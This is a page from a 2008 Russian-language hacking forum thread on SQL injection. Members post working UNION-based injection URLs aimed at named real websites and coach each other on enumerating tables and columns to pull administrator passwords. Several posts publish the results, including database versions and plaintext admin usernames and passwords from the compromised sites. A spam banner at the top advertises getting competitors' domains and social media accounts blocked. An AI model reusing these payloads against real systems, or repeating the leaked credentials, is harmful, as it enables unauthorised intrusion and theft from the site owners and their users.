УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 544 из 1242

544

Опции темы

Поиск в этой теме

Опции просмотра

#5431

10.05.2008, 00:06

Muhacir

Участник форума

Регистрация: 05.10.2006

Сообщений: 133

Провел на форуме:
548338

Репутация: 165

Отправить сообщение для Muhacir с помощью ICQ

Цитата:

Сообщение от diznt

http://r-est.biz/?r=nj&n=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18/*
Помогите я узнал токо имена таблиц больше ничего не могу почему то сделать. требуеться пасс,хеш админа

http://r-est.biz/?r=nj&n=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(v ersion(),0x3a,user(),0x3a,database()),14,15,16,17, 18+from+users/*

переберай колонки

типо

user
pass

Последний раз редактировалось Muhacir; 10.05.2008 в 00:17..

#5432

10.05.2008, 00:08

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Отправить сообщение для Gorev с помощью ICQ

Отправить сообщение для Gorev с помощью Yahoo

2 Muhacir preamo lojkoi v rot...pust' dumaet sam..pro limit i pro vse 4itaet

#5433

10.05.2008, 00:52

diznt

Постоянный

Регистрация: 31.01.2008

Сообщений: 643

Провел на форуме:
6128108

Репутация: 445

Gorev просто хотябы сказать мне какие приблизительно колонки перебирать дальше я сам ))) Muhacir . вообщем спсп обоим

#5434

10.05.2008, 00:57

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

2 dizn ti limit poiuzai i vibirai sam columns kakie tebe nujni...no obi4o id, name, pass ili username,password,login etc.....zapros delae6 primerno takoi
http://r-est.biz/?r=nj&n=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 , 16,column_name,18+from+information_schema.columns+ where+table_name=(tablitza kotoraya interesuet)+li mit+1,1/* dalshe igraisea limitom meneay zna4enie pervoi tzifri

#5435

10.05.2008, 01:01

diznt

Постоянный

Регистрация: 31.01.2008

Сообщений: 643

Провел на форуме:
6128108

Репутация: 445

щя заюзаем

#5436

10.05.2008, 01:04

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

imea tablitzi vozmojno nado budet v sql hex peredelivati http://x3k.ru/ tut naide6....vse prosto

#5437

10.05.2008, 14:10

†c0(aIn?†

Новичок

Регистрация: 04.05.2008

Сообщений: 16

Провел на форуме:
209786

Репутация: 45

http://www.fastcasual.com/research.php?rc_id=4+uni on+select+1,2,3,4,5--

atmmarketplace@localhost
sitedb
5.0.22

http://www.fastcasual.com/research.php?rc_id=4+uni on+select+1,2,3,4,5--
atmmarketplace@localhost
sitedb
5.0.22

#5438

10.05.2008, 18:34

KPOT_f!nd

Познавший АНТИЧАТ

Регистрация: 25.08.2006

Сообщений: 1,524

Провел на форуме:
3405508

Репутация: 1745

Код:

http://www.pharma-id.com/thedirectory/profile.asp?id=1+or+1=(SELECT+TOP+1+pName+from+tblWebsiteUsers)--

так же можно подставить: pPassword, pEmail, pName

Код:

http://www.zaishu.com/shop.php?id=-17+union+select+1,2,3,username,password,6,7,8,9,10,11,12,13,14+from+adminrights/*

admin:zaishu62

#5439

10.05.2008, 19:27

159932

Постоянный

Регистрация: 28.09.2007

Сообщений: 820

Провел на форуме:
6722038

Репутация: 1385

www.worgas.it

Цитата:

http://www.worgas.it/products.php?id=-13+union+select+concat_ws(0x3a,username,password,e mail_address),2,3+from+clienti/*
http://www.worgas.it/products.php?id=-13+union+select+concat_ws(0x3a,username,password,e mail_address),2,3+from+rc_users/*

===============================================
scuoladott.psy.unipd.it

Цитата:

http://scuoladott.psy.unipd.it/news.php?id=-12+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,usern ame,password),9,0,1,2,3+from+percez_cal_users/*
http://scuoladott.psy.unipd.it/news.php?id=-12+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,usern ame,password),9,0,1,2,3+from+pscbio_cal_users/*

это вроде админы - но где админка - ???
admin:adm1n
campana:g1anlu
agrillo:chragri
===============================================

Цитата:

http://www.freeinfosociety.com/site.php?postnum=460'+and+1=0+union+select+1,2,con cat(name,0x3a,password),4+from+users/*

Последний раз редактировалось 159932; 10.05.2008 в 19:29..

#5440

10.05.2008, 20:37

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

http://www.pro-science.asm.md/?lang=ro&view_ev&ev=-90+union+select+1,2,3,4,5,6,7 ,8,9 /*

version() -5.0.32-Debian_7etch5
database()-proscience
user()-
proscience@localhost

dal6e bilo v lom razvivat'....

Страница 544 из 1242

544

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 19 (пользователей: 0 , гостей: 19)

Быстрый переход